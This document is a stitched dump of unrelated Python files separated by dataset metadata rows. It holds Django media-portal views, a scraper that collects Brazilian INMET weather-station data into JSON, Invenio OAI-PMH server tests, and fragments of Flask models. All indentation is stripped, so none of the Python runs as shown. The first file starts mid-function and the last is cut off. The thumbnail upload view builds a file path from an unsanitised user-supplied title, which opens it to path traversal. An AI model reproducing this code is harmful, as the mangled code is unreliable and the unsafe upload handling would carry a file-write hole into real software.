queryset = itertools.chain(MediaItem.objects.filter(encodingDone=True).order_by('-date','-modified'),Collection.objects.all().order_by('-created'))
else:
queryset = itertools.chain(MediaItem.objects.filter(encodingDone=True, published=True).order_by('-date','-modified'),Collection.objects.all().order_by('-created'))
queryset_sorted = sorted(queryset, key=attrgetter('date', 'created'), reverse=True)
paginator = Paginator(queryset_sorted,16)
channel_list = Channel.objects.all()
page = request.GET.get('page')
rss_list = []
for file_type in MEDIA_FORMATS:
rss_list.append((MEDIA_FORMATS[file_type].format_key,MEDIA_FORMATS[file_type].mediatype,"/feeds/latest/"+file_type))
rss_list.append(('torrent','torrent','/feeds/latest/torrent'))
try:
mediaitems = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
mediaitems = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
mediaitems = paginator.page(paginator.num_pages)
return TemplateResponse(request, 'portal/index.html', {'latest_mediaitems_list': mediaitems, 'channel_list': channel_list, 'rss_list': rss_list})
def channel_list(request,slug):
''' This view is the view for the channel's list it works almost like the index view'''
channel = get_object_or_404(Channel, slug=slug)
if request.user.is_authenticated():
queryset = itertools.chain(MediaItem.objects.filter(encodingDone=True, channel__slug=slug).order_by('-date','-modified'),Collection.objects.filter(channel__slug=slug).order_by('-created'))
else:
queryset = itertools.chain(MediaItem.objects.filter(encodingDone=True, published=True, channel__slug=slug).order_by('-date','-modified'),Collection.objects.filter(channel__slug=slug).order_by('-created'))
queryset_sorted = sorted(queryset, key=attrgetter('date', 'created'), reverse=True)
paginator = Paginator(queryset_sorted,15)
channel_list = Channel.objects.all()
page = request.GET.get('page')
rss_list = []
for file_type in MEDIA_FORMATS:
rss_list.append((MEDIA_FORMATS[file_type].format_key,MEDIA_FORMATS[file_type].mediatype,"/feeds/"+channel.slug+"/"+file_type))
rss_list.append(('torrent','torrent','/feeds/'+channel.slug+'/torrent'))
try:
mediaitems = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
mediaitems = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
mediaitems = paginator.page(paginator.num_pages)
return TemplateResponse(request, 'portal/channel.html', {'mediaitems_list': mediaitems, 'channel': channel, 'channel_list': channel_list, 'rss_list': rss_list})
@login_required
def get_duration(request, slug):
mediaitem = get_object_or_404(MediaItem, slug=slug)
if mediaitem.get_and_save_duration():
duration_feedback = seconds_to_hms(mediaitem.duration)
else:
duration_feedback = "Error"
return HttpResponse(duration_feedback)
def detail(request, slug):
''' Handles the detail view of a media item (the player so to say) and handles the comments (this should become nicer with AJAX and stuff)'''
mediaitem = get_object_or_404(MediaItem, slug=slug)
if request.user.is_authenticated():
comment_list = Comment.objects.filter(item=mediaitem).order_by('-created')
else:
comment_list = Comment.objects.filter(item=mediaitem,moderated=True).order_by('-created')
if request.method == 'POST':
comment = Comment(item=mediaitem,ip=request.META["REMOTE_ADDR"])
form = CommentForm(request.POST, instance=comment)
if form.is_valid():
comment = form.save(commit=False)
comment.save()
message = _(u"Your comment will be moderated")
comment.send_notification_mail()
return TemplateResponse(request, 'portal/items/detail.html', {'comment_list': comment_list, 'mediaitem': mediaitem, 'comment_form': CommentForm(), 'message': message})
else:
return TemplateResponse(request, 'portal/items/detail.html', {'comment_list': comment_list, 'mediaitem': mediaitem, 'comment_form': form})
else:
form = CommentForm()
return TemplateResponse(request, 'portal/items/detail.html', {'mediaitem': mediaitem, 'comment_list': comment_list, 'comment_form': form})
def iframe(request, slug):
''' Returns an iframe for a item so that media items can be shared easily '''
mediaitem = get_object_or_404(MediaItem, slug=slug)
return TemplateResponse(request, 'portal/items/iframe.html', {'mediaitem': mediaitem})
def tag(request, tag):
''' Gets all media items for a specified tag'''
if request.user.is_authenticated():
mediaitemslist = MediaItem.objects.filter(encodingDone=True, tags__slug__in=[tag]).order_by('-date')
else:
mediaitemslist = MediaItem.objects.filter(encodingDone=True, published=True, tags__slug__in=[tag]).order_by('-date')
tag_name = get_object_or_404(Tag, slug=tag)
return TemplateResponse(request, 'portal/items/list.html', {'mediaitems_list': mediaitemslist, 'tag': tag_name})
def collection(request, slug):
''' Gets all media items for a channel'''
collection = get_object_or_404(Collection, slug=slug)
rss_list = []
for file_type in MEDIA_FORMATS:
rss_list.append((MEDIA_FORMATS[file_type].format_key,MEDIA_FORMATS[file_type].mediatype,"/feeds/collection/"+collection.slug+"/"+file_type))
if request.user.is_authenticated():
mediaitemslist = collection.items.filter(encodingDone=True)
else:
mediaitemslist = collection.items.filter(encodingDone=True, published=True)
return TemplateResponse(request, 'portal/collection.html', {'mediaitems_list': mediaitemslist, 'collection': collection, 'rss_list': rss_list })
def search(request):
''' The search view for handling the search using Django's "Q"-class (see normlize_query and _get_query)'''
query_string = ''
found_entries = None
if ('q' in request.GET) and request.GET['q'].strip():
query_string = request.GET['q']
entry_query = _get_query(query_string, ['title', 'description', 'tags__name'])
if request.user.is_authenticated():
found_entries = MediaItem.objects.filter(entry_query).order_by('-date')
else:
found_entries = MediaItem.objects.filter(entry_query, published=True).order_by('-date')
return TemplateResponse(request, 'portal/search_results.html', { 'query_string': query_string, 'mediaitems_list': found_entries})
def search_json(request):
''' The search view for handling the search using Django's "Q"-class (see normlize_query and _get_query)'''
query_string = ''
found_entries = None
if ('q' in request.GET) and request.GET['q'].strip():
query_string = request.GET['q']
entry_query = _get_query(query_string, ['title', 'description','tags__name'])
found_entries = MediaItem.objects.filter(entry_query).order_by('-date')
data = serializers.serialize('json', found_entries)
return HttpResponse(data, content_type = 'application/javascript; charset=utf8')
def tag_json(request, tag):
mediaitemslist = MediaItem.objects.filter(encodingDone=True, published=True, tags__name__in=[tag]).order_by('-date')
data = serializers.serialize('json', mediaitemslist)
return HttpResponse(data, content_type = 'application/javascript; charset=utf8')
@login_required
def submittal(request, subm_id):
submittal = get_object_or_404(Submittal, pk = subm_id)
if request.method == 'POST':
form = SubmittalForm(request.POST)
if form.is_valid():
mediaitem = form.save()
mediaitem.user = request.user
mediaitem.save()
form.create_mediafiles(mediaitem)
mediaitem.get_and_save_duration()
return redirect(index)
else:
return TemplateResponse(request, 'portal/submittal.html', {'submittal_form': form, 'submittal': submittal})
else:
form = SubmittalForm(initial={
'title': submittal.media_title,
'description': submittal.media_description,
'channel': submittal.media_channel,
'license': submittal.media_license,
'linkURL': submittal.media_linkURL,
'torrentURL': submittal.media_torrentURL,
'media_mp3URL': submittal.media_mp3URL,
'media_oggURL': submittal.media_oggURL,
'media_opusURL': submittal.media_opusURL,
'videoThumbURL': submittal.media_videoThumbURL,
'audioThumbURL': submittal.media_audioThumbURL,
'published': submittal.media_published,
'tags': ", ".join(str(x) for x in submittal.media_tags.all()),
'torrentDone': submittal.media_torrentDone,
'encodingDone': True,
})
return TemplateResponse(request, 'portal/submittal.html', {'submittal_form': form, 'submittal': submittal})
@login_required
def upload_thumbnail(request):
if request.method == 'POST':
form = ThumbnailForm(request.POST, request.FILES or None)
if form.is_valid():
if (request.FILES['file'].content_type == 'image/png' or request.FILES['file'].content_type == 'image/jpeg') and not form.data['title'] == '':
_handle_uploaded_thumbnail(request.FILES['file'], form.data['title'])
message = _("The upload of %s was successful") % (form.data['title'])
form = ThumbnailForm()
return TemplateResponse(request, 'portal/thumbnail.html', {'thumbnail_form': ThumbnailForm(), 'thumbs_list':_get_thumbnails_list, 'message': message})
else:
error = _("Please upload an image file")
return TemplateResponse(request, 'portal/thumbnail.html', {'thumbnail_form': form, 'thumbs_list':_get_thumbnails_list, 'error': error})
else:
return TemplateResponse(request, 'portal/thumbnail.html', {'thumbnail_form': form, 'thumbs_list':_get_thumbnails_list})
else:
return TemplateResponse(request, 'portal/thumbnail.html', {'thumbnail_form': ThumbnailForm(), 'thumbs_list':_get_thumbnails_list})
def _handle_uploaded_thumbnail(f, filename):
suffix = '.png' if (f.content_type == 'image/png') else '.jpg'
suffix = '' if (filename.endswith(suffix)) else suffix
destination = open(settings.THUMBNAILS_DIR + filename + suffix, 'wb+')
for chunk in f.chunks():
destination.write(chunk)
destination.close()
@login_required
def submit(request):
''' The view for uploading the items. Only authenticated users can upload media items!
We use django tasks to make a new task task for encoding this items. If we use
bittorrent to distribute our files we also use django tasks to make the .torrent
files (this can take a few minutes for very large files '''
if request.method == 'POST':
form = MediaItemForm(request.POST, request.FILES or None)
if form.is_valid():
media_item = form.save()
if form.cleaned_data['thumbURL']:
media_item.audioThumbURL = form.cleaned_data['thumbURL']
media_item.videoThumbURL = form.cleaned_data['thumbURL']
media_item.user = request.user
media_item.save()
media_item.get_and_save_duration()
outputdir = settings.ENCODING_OUTPUT_DIR + media_item.slug
if not os.path.exists(outputdir):
os.makedirs(outputdir)
cover_task = djangotasks.task_for_object(media_item.get_and_save_cover)
djangotasks.run_task(cover_task)
for target_format in form.cleaned_data['fileFormats']:
media_format = MEDIA_FORMATS[target_format]
url = settings.ENCODED_BASE_URL + media_item.slug + '/' + media_item.slug + media_format.extension
media_file = MediaFile.objects.create(title=media_item.title + " " + media_format.text,
url=url, file_format=media_format.format_key,
media_item=media_item, mediatype=media_format.mediatype)
encoding_task = djangotasks.task_for_object(media_file.encode_media)
djangotasks.run_task(encoding_task)
if settings.USE_BITTORRENT:
torrent_task = djangotasks.task_for_object(media_item.create_bittorrent)
djangotasks.run_task(torrent_task)
return redirect(index)
return TemplateResponse(request, 'portal/submit.html', {'submit_form': form})
else:
form = MediaItemForm()
return TemplateResponse(request, 'portal/submit.html', {'submit_form': form})
@login_required
def status(request):
tasks_mediaitem = djangotasks.models.Task.objects.filter(model="portal.mediaitem").exclude(status="successful")
tasks_mediafile = djangotasks.models.Task.objects.filter(model="portal.mediafile").exclude(status="successful")
mediaitem_ids = set(map((lambda mediaitem: mediaitem.object_id), tasks_mediaitem))
for mediafile in tasks_mediafile:
try:
mediaitem_ids.add(MediaFile.objects.get(pk=mediafile.object_id).media_item.pk)
except MediaFile.DoesNotExist:
pass
mediaitems = MediaItem.objects.filter(pk__in=mediaitem_ids)
return TemplateResponse(request, 'portal/status.html', {'mediaitems': mediaitems})
def _normalize_query(query_string,
findterms=re.compile(r'"([^"]+)"|(\S+)').findall,
normspace=re.compile(r'\s{2,}').sub):
''' Splits the query string in invidual keywords, getting rid of unecessary spaces
and grouping quoted words together.
Example:
>>> _normalize_query(' some random words "with quotes " and spaces')
['some', 'random', 'words', 'with quotes', 'and', 'spaces']
'''
return [normspace(' ', (t[0] or t[1]).strip()) for t in findterms(query_string)]
def _get_query(query_string, search_fields):
''' Returns a query, that is a combination of Q objects. That combination
aims to search keywords within a model by testing the given search fields.
'''
query = None # Query to search for every search term
terms = _normalize_query(query_string)
for term in terms:
or_query = None # Query to search for a given term in each field
for field_name in search_fields:
q = Q(**{"%s__icontains" % field_name: term})
if or_query is None:
or_query = q
else:
or_query = or_query | q
if query is None:
query = or_query
else:
query = query & or_query
return query
def _get_thumbnails_list():
thumbnails_list = getThumbnails(settings.THUMBNAILS_DIR)
del thumbnails_list[0]
return thumbnails_list
|
bsd-2-clause
| 1,480,997,677,373,973,200 | 49.435185 | 212 | 0.663668 | false |
LucasFerreiraDaSilva/ScrapingINMET
|
geraBase.py
|
1
|
3704
|
"""
Autor: Lucas Ferreira da Silva
Email: [email protected]
Descricao: Script para download dos dados referentes a cada estacao metereologica
e criacao de uma pequena "base de dados" em formato JSON referente a
todas as estacoes
Execucao (comando): python3 geraBase.py
Saida: Arquivo JSON (estacoes.json) contendo dados de todas as estacoes
metereologicas do INMET
"""
import requests
import json
import bs4
import re
# URL base para Scraping das estacoes
url_map = "http://www.inmet.gov.br/sonabra/maps/pg_mapa.php"
res = requests.get (url_map)
res.raise_for_status()
# Separacao das estacoes
list_markers = (res.text).split("//************* ESTACÃO ")
del list_markers[0]
# Inicializacao da lista de dados das estacoes para posterior tratamento
list_stations = []
# Scraping dos dados mais brutos de cada estacao
for i in list_markers:
st = (i.split("var imagem",maxsplit=1))[0].split("var ")
# Capturar id da estação
station_id = str((st[0].split(maxsplit=1))[0])
# Capturar label da estacao
station_label = re.search(r"(?<=')[^']+(?=')", str(st[-1])).group(0)
# Capturar html da estacao
station_html = str(st[2].split("html = ", maxsplit=1)[1])
# Criacao de dicionario auxiliar de dados de cada estacao
station_info = {}
station_info['id'] = station_id
station_info['label'] = station_label
station_info['html'] = station_html
list_stations.append(station_info)
# Inicializacao do dicionario de estacoes
stations = {}
# Scraping refinado dos dados de cada estacao
for x in list_stations:
soup = bs4.BeautifulSoup(x['html'], 'html.parser')
# Captura o link da tabela de dados
link = ""
for a in soup.find_all('a'):
l = a.get('href')
if (l.find("pg_dspDadosCodigo_sim.php?", 32) != -1):
link = l
break
aux = (x['html'].split("<b><b>", maxsplit=1))[1].split("<table ", maxsplit=1)
# Captura lista dos dados geograficos
localization = ((aux[1].split("</table>", maxsplit=1))[1].split("</font>", maxsplit=1)[0]).split("<br>")
# Captura demais dados da estacao
data_aux = ((aux[0].replace("<b>", "")).replace("</b>","")).split("<br>")
data = []
for d in data_aux:
if (d.find("<a ", 0, 4) == -1) and (d.find("</a>", 0, 4) == -1) and (len(d) > 0):
data.append(d)
# Criacao do objeto estacao para o JSON
station_data = {}
details = {}
details['estacao'] = data[0].split(": ")[1]
details['codigo_omm'] = data[1].split(": ")[1]
if (len(data) > 2):
details['registro'] = data[2].split(": ")[1]
details['temp_max'] = (data[3].split(": ")[1]).replace("º","")
details['temp_min'] = (data[4].split(": ")[1]).replace("º","")
details['umidade'] = data[5].split(": ")[1]
details['pressao'] = data[6].split(": ")[1]
details['precipitacao'] = data[7].split(": ")[1]
details['vento_dir'] = (data[8].split(": ")[1]).replace("º","graus")
details['vento_vel'] = data[9].split(": ")[1]
station_data['label'] = x['label']
station_data['url'] = link
station_data['latitude'] = (localization[1].split(": ")[1]).replace("º","")
station_data['longitude'] = (localization[2].split(": ")[1]).replace("º","")
station_data['altitude'] = localization[3].split(": ")[1]
station_data['abertura'] = localization[0].split(": ")[1]
station_data['detalhes'] = details
stations[str(x['id'])] = station_data
# Escrita dos dados em arquivo JSON
with open('estacoes.json', 'w') as fp:
json.dump(stations, fp, indent=4, ensure_ascii=False, sort_keys=True)
print("Database successfully generated!")
|
mit
| 8,083,539,564,384,112,000 | 31.707965 | 108 | 0.606061 | false |
jirikuncar/invenio-oaiserver
|
tests/test_verbs.py
|
1
|
18989
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015, 2016 CERN.
#
# Invenio is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Test OAI verbs."""
from __future__ import absolute_import
import uuid
from copy import deepcopy
from time import sleep
from invenio_db import db
from invenio_indexer.api import RecordIndexer
from invenio_pidstore.minters import recid_minter
from invenio_records.api import Record
from lxml import etree
from invenio_oaiserver.minters import oaiid_minter
from invenio_oaiserver.models import OAISet
from invenio_oaiserver.response import NS_DC, NS_OAIDC, NS_OAIPMH, \
datetime_to_datestamp
def _xpath_errors(body):
"""Find errors in body."""
return list(body.iter('{*}error'))
def test_no_verb(app):
"""Test response when no verb is specified."""
with app.test_client() as c:
result = c.get('/oai2d')
tree = etree.fromstring(result.data)
assert 'Missing data for required field.' in _xpath_errors(
tree)[0].text
def test_wrong_verb(app):
with app.test_client() as c:
result = c.get('/oai2d?verb=Aaa')
tree = etree.fromstring(result.data)
assert 'This is not a valid OAI-PMH verb:Aaa' in _xpath_errors(
tree)[0].text
def test_identify(app):
with app.test_client() as c:
result = c.get('/oai2d?verb=Identify')
assert 200 == result.status_code
tree = etree.fromstring(result.data)
namespaces = {'x': NS_OAIPMH}
assert len(tree.xpath('/x:OAI-PMH', namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:Identify',
namespaces=namespaces)) == 1
repository_name = tree.xpath('/x:OAI-PMH/x:Identify/x:repositoryName',
namespaces=namespaces)
assert len(repository_name) == 1
assert repository_name[0].text == 'Invenio-OAIServer'
base_url = tree.xpath('/x:OAI-PMH/x:Identify/x:baseURL',
namespaces=namespaces)
assert len(base_url) == 1
assert base_url[0].text == 'http://app/oai2d'
protocolVersion = tree.xpath('/x:OAI-PMH/x:Identify/x:protocolVersion',
namespaces=namespaces)
assert len(protocolVersion) == 1
assert protocolVersion[0].text == '2.0'
adminEmail = tree.xpath('/x:OAI-PMH/x:Identify/x:adminEmail',
namespaces=namespaces)
assert len(adminEmail) == 1
assert adminEmail[0].text == '[email protected]'
earliestDatestamp = tree.xpath(
'/x:OAI-PMH/x:Identify/x:earliestDatestamp',
namespaces=namespaces)
assert len(earliestDatestamp) == 1
deletedRecord = tree.xpath('/x:OAI-PMH/x:Identify/x:deletedRecord',
namespaces=namespaces)
assert len(deletedRecord) == 1
assert deletedRecord[0].text == 'no'
granularity = tree.xpath('/x:OAI-PMH/x:Identify/x:granularity',
namespaces=namespaces)
assert len(granularity) == 1
def test_getrecord(app):
schema = {
'type': 'object',
'properties': {
'title': {'type': 'string'},
'field': {'type': 'boolean'},
},
'required': ['title'],
}
with app.test_request_context():
with db.session.begin_nested():
record = Record.create({'title': 'Test0', '$schema': schema}).model
recid_minter(record.id, record.json)
pid = oaiid_minter(record.id, record.json)
db.session.commit()
pid_value = pid.pid_value
pid_updated = pid.updated
with app.test_client() as c:
result = c.get(
"/oai2d?verb=GetRecord&identifier={0}&metadataPrefix=oai_dc"
.format(pid_value))
assert 200 == result.status_code
tree = etree.fromstring(result.data)
namespaces = {'x': NS_OAIPMH}
assert len(tree.xpath('/x:OAI-PMH', namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:GetRecord',
namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:GetRecord/x:header',
namespaces=namespaces)) == 1
assert len(tree.xpath(
'/x:OAI-PMH/x:GetRecord/x:header/x:identifier',
namespaces=namespaces)) == 1
identifier = tree.xpath(
'/x:OAI-PMH/x:GetRecord/x:header/x:identifier/text()',
namespaces=namespaces)
assert identifier == [str(record.id)]
datestamp = tree.xpath(
'/x:OAI-PMH/x:GetRecord/x:header/x:datestamp/text()',
namespaces=namespaces)
assert datestamp == [datetime_to_datestamp(pid_updated)]
assert len(tree.xpath('/x:OAI-PMH/x:GetRecord/x:metadata',
namespaces=namespaces)) == 1
def test_getrecord_fail(app):
"""Test GetRecord if record doesn't exist."""
with app.test_request_context():
with app.test_client() as c:
result = c.get(
"/oai2d?verb=GetRecord&identifier={0}&metadataPrefix=oai_dc"
.format('not-exist-pid'))
assert 422 == result.status_code
tree = etree.fromstring(result.data)
_check_xml_error(tree, code='idDoesNotExist')
def _check_xml_error(tree, code):
"""Text xml for a error idDoesNotExist."""
namespaces = {'x': NS_OAIPMH}
assert len(tree.xpath('/x:OAI-PMH', namespaces=namespaces)) == 1
error = tree.xpath('/x:OAI-PMH/x:error', namespaces=namespaces)
assert len(error) == 1
assert error[0].attrib['code'] == code
def test_identify_with_additional_args(app):
with app.test_client() as c:
result = c.get('/oai2d?verb=Identify¬AValidArg=True')
tree = etree.fromstring(result.data)
assert 'You have passed too many arguments.' == _xpath_errors(
tree)[0].text
def test_listmetadataformats(app):
"""Test ListMetadataFormats."""
_listmetadataformats(app=app, query='/oai2d?verb=ListMetadataFormats')
def test_listmetadataformats_record(app):
"""Test ListMetadataFormats for a record."""
schema = {
'type': 'object',
'properties': {
'title': {'type': 'string'},
'field': {'type': 'boolean'},
},
'required': ['title'],
}
with app.test_request_context():
with db.session.begin_nested():
record_id = uuid.uuid4()
data = {'title': 'Test0', '$schema': schema}
recid_minter(record_id, data)
pid = oaiid_minter(record_id, data)
Record.create(data, id_=record_id)
pid_value = pid.pid_value
db.session.commit()
_listmetadataformats(
app=app,
query='/oai2d?verb=ListMetadataFormats&identifier={0}'.format(
pid_value))
def test_listmetadataformats_record_fail(app):
"""Test ListMetadataFormats for a record that doesn't exist."""
query = '/oai2d?verb=ListMetadataFormats&identifier={0}'.format(
"pid-not-exixts")
with app.test_request_context():
with app.test_client() as c:
result = c.get(query)
tree = etree.fromstring(result.data)
_check_xml_error(tree, code='idDoesNotExist')
def _listmetadataformats(app, query):
"""Try ListMetadataFormats."""
with app.test_request_context():
with app.test_client() as c:
result = c.get(query)
tree = etree.fromstring(result.data)
namespaces = {'x': NS_OAIPMH}
assert len(tree.xpath('/x:OAI-PMH', namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListMetadataFormats',
namespaces=namespaces)) == 1
metadataFormats = tree.xpath(
'/x:OAI-PMH/x:ListMetadataFormats/x:metadataFormat',
namespaces=namespaces)
cfg_metadataFormats = deepcopy(
app.config.get('OAISERVER_METADATA_FORMATS', {}))
assert len(metadataFormats) == len(cfg_metadataFormats)
for metadataFormat in metadataFormats:
# prefix
prefix = metadataFormat.xpath(
'/x:OAI-PMH/x:ListMetadataFormats/x:metadataFormat/'
'x:metadataPrefix', namespaces=namespaces)
assert len(prefix) == 1
assert prefix[0].text in cfg_metadataFormats
# schema
schema = metadataFormat.xpath(
'/x:OAI-PMH/x:ListMetadataFormats/x:metadataFormat/'
'x:schema', namespaces=namespaces)
assert len(schema) == 1
assert schema[0].text in cfg_metadataFormats[
prefix[0].text]['schema']
# metadataNamespace
metadataNamespace = metadataFormat.xpath(
'/x:OAI-PMH/x:ListMetadataFormats/x:metadataFormat/'
'x:metadataNamespace', namespaces=namespaces)
assert len(metadataNamespace) == 1
assert metadataNamespace[0].text in cfg_metadataFormats[
prefix[0].text]['namespace']
# remove tested format
del cfg_metadataFormats[prefix[0].text]
def test_listsets(app):
"""Test ListSets."""
with app.test_request_context():
with db.session.begin_nested():
a = OAISet(spec='test', name='Test', description="test desc")
db.session.add(a)
with app.test_client() as c:
result = c.get('/oai2d?verb=ListSets')
tree = etree.fromstring(result.data)
namespaces = {'x': NS_OAIPMH}
assert len(tree.xpath('/x:OAI-PMH', namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListSets',
namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListSets/x:set',
namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListSets/x:set/x:setSpec',
namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListSets/x:set/x:setName',
namespaces=namespaces)) == 1
assert len(tree.xpath(
'/x:OAI-PMH/x:ListSets/x:set/x:setDescription',
namespaces=namespaces
)) == 1
namespaces['y'] = NS_OAIDC
assert len(
tree.xpath('/x:OAI-PMH/x:ListSets/x:set/x:setDescription/y:dc',
namespaces=namespaces)
) == 1
namespaces['z'] = NS_DC
assert len(
tree.xpath('/x:OAI-PMH/x:ListSets/x:set/x:setDescription/y:dc/'
'z:description', namespaces=namespaces)
) == 1
text = tree.xpath(
'/x:OAI-PMH/x:ListSets/x:set/x:setDescription/y:dc/'
'z:description/text()', namespaces=namespaces)
assert len(text) == 1
assert text[0] == 'test desc'
def test_fail_missing_metadataPrefix(app):
"""Test ListRecords fail missing metadataPrefix."""
queries = [
'/oai2d?verb=ListRecords',
'/oai2d?verb=GetRecord&identifier=123',
'/oai2d?verb=ListIdentifiers'
]
for query in queries:
with app.test_request_context():
with app.test_client() as c:
result = c.get(query)
tree = etree.fromstring(result.data)
_check_xml_error(tree, code='badArgument')
def test_fail_not_exist_metadataPrefix(app):
"""Test ListRecords fail not exist metadataPrefix."""
queries = [
'/oai2d?verb=ListRecords&metadataPrefix=not-exist',
'/oai2d?verb=GetRecord&identifier=123&metadataPrefix=not-exist',
'/oai2d?verb=ListIdentifiers&metadataPrefix=not-exist'
]
for query in queries:
with app.test_request_context():
with app.test_client() as c:
result = c.get(query)
tree = etree.fromstring(result.data)
_check_xml_error(tree, code='badArgument')
def test_listrecords_fail_missing_metadataPrefix(app):
"""Test ListRecords fail missing metadataPrefix."""
query = '/oai2d?verb=ListRecords&'
with app.test_request_context():
with app.test_client() as c:
result = c.get(query)
tree = etree.fromstring(result.data)
_check_xml_error(tree, code='badArgument')
def test_listrecords(app):
"""Test ListRecords."""
schema = {
'type': 'object',
'properties': {
'title': {'type': 'string'},
'field': {'type': 'boolean'},
},
'required': ['title'],
}
with app.test_request_context():
indexer = RecordIndexer()
with db.session.begin_nested():
record_id = uuid.uuid4()
data = {'title': 'Test0', '$schema': schema}
recid_minter(record_id, data)
oaiid_minter(record_id, data)
record = Record.create(data, id_=record_id)
db.session.commit()
indexer.index_by_id(record_id)
sleep(1)
with app.test_client() as c:
result = c.get('/oai2d?verb=ListRecords&metadataPrefix=oai_dc')
tree = etree.fromstring(result.data)
namespaces = {'x': NS_OAIPMH}
assert len(tree.xpath('/x:OAI-PMH', namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListRecords',
namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListRecords/x:record',
namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListRecords/x:record/x:header',
namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListRecords/x:record/x:header'
'/x:identifier', namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListRecords/x:record/x:header'
'/x:datestamp', namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListRecords/x:record/x:metadata',
namespaces=namespaces)) == 1
def test_listidentifiers(app):
"""Test verb ListIdentifiers."""
schema = {
'type': 'object',
'properties': {
'title': {'type': 'string'},
'field': {'type': 'boolean'},
},
'required': ['title'],
}
with app.test_request_context():
indexer = RecordIndexer()
with db.session.begin_nested():
record_id = uuid.uuid4()
data = {'title': 'Test0', '$schema': schema}
recid_minter(record_id, data)
pid = oaiid_minter(record_id, data)
record = Record.create(data, id_=record_id)
db.session.commit()
indexer.index_by_id(record_id)
sleep(1)
pid_value = pid.pid_value
with app.test_client() as c:
result = c.get(
"/oai2d?verb=ListIdentifiers&metadataPrefix=oai_dc"
)
tree = etree.fromstring(result.data)
namespaces = {'x': NS_OAIPMH}
assert len(tree.xpath('/x:OAI-PMH', namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListIdentifiers',
namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListIdentifiers/x:header',
namespaces=namespaces)) == 1
identifier = tree.xpath(
'/x:OAI-PMH/x:ListIdentifiers/x:header/x:identifier',
namespaces=namespaces
)
assert len(identifier) == 1
assert identifier[0].text == str(pid_value)
datestamp = tree.xpath(
'/x:OAI-PMH/x:ListIdentifiers/x:header/x:datestamp',
namespaces=namespaces
)
assert len(datestamp) == 1
assert datestamp[0].text == datetime_to_datestamp(record.updated)
def test_list_sets_long(app):
"""Test listing of sets."""
from invenio_db import db
from invenio_oaiserver.models import OAISet
with app.app_context():
with db.session.begin_nested():
for i in range(27):
db.session.add(OAISet(
spec='test{0}'.format(i),
name='Test{0}'.format(i),
description='test desc {0}'.format(i),
search_pattern='title:Test{0}'.format(i),
))
db.session.commit()
namespaces = {'x': NS_OAIPMH}
with app.test_client() as c:
# First page:
result = c.get('/oai2d?verb=ListSets')
tree = etree.fromstring(result.data)
assert len(tree.xpath('/x:OAI-PMH/x:ListSets/x:set',
namespaces=namespaces)) == 10
resumption_token = tree.xpath(
'/x:OAI-PMH/x:ListSets/x:resumptionToken', namespaces=namespaces
)[0]
assert resumption_token.text
# Second page:
result = c.get('/oai2d?verb=ListSets&resumptionToken={0}'.format(
resumption_token.text
))
tree = etree.fromstring(result.data)
assert len(tree.xpath('/x:OAI-PMH/x:ListSets/x:set',
namespaces=namespaces)) == 10
resumption_token = tree.xpath(
'/x:OAI-PMH/x:ListSets/x:resumptionToken', namespaces=namespaces
)[0]
assert resumption_token.text
# Third page:
result = c.get('/oai2d?verb=ListSets&resumptionToken={0}'.format(
resumption_token.text
))
tree = etree.fromstring(result.data)
assert len(tree.xpath('/x:OAI-PMH/x:ListSets/x:set',
namespaces=namespaces)) == 7
resumption_token = tree.xpath(
'/x:OAI-PMH/x:ListSets/x:resumptionToken', namespaces=namespaces
)[0]
assert not resumption_token.text
def test_list_sets_with_resumption_token_and_other_args(app):
pass
|
gpl-2.0
| 6,154,629,541,478,651,000 | 34.964015 | 79 | 0.577229 | false |
micjabbour/AndroidGuard-WebApp
|
AndroidGuard/models.py
|
1
|
3073
|
from . import db
from .config import AppConfig
from datetime import datetime
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
from sqlalchemy import desc
from itsdangerous import Serializer, BadSignature
class Location(db.Model):
id = db.Column(db.Integer, primary_key=True)
latitude = db.Column(db.DECIMAL(9,6), nullable=False)
longitude = db.Column(db.DECIMAL(9,6), nullable=False)
timestamp = db.Column(db.DateTime, default=datetime.utcnow)
device_id = db.Column(db.Integer, db.ForeignKey('device.id'), nullable=False)
def serialize(self):
return {'latitude': str(self.latitude),
'longitude': str(self.longitude),
'timestamp': self.timestamp.isoformat()+'Z' # HACK
}
class Device(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Text)
fcm_token = db.Column(db.Text)
locations = db.relationship('Location', backref='device', lazy='select')
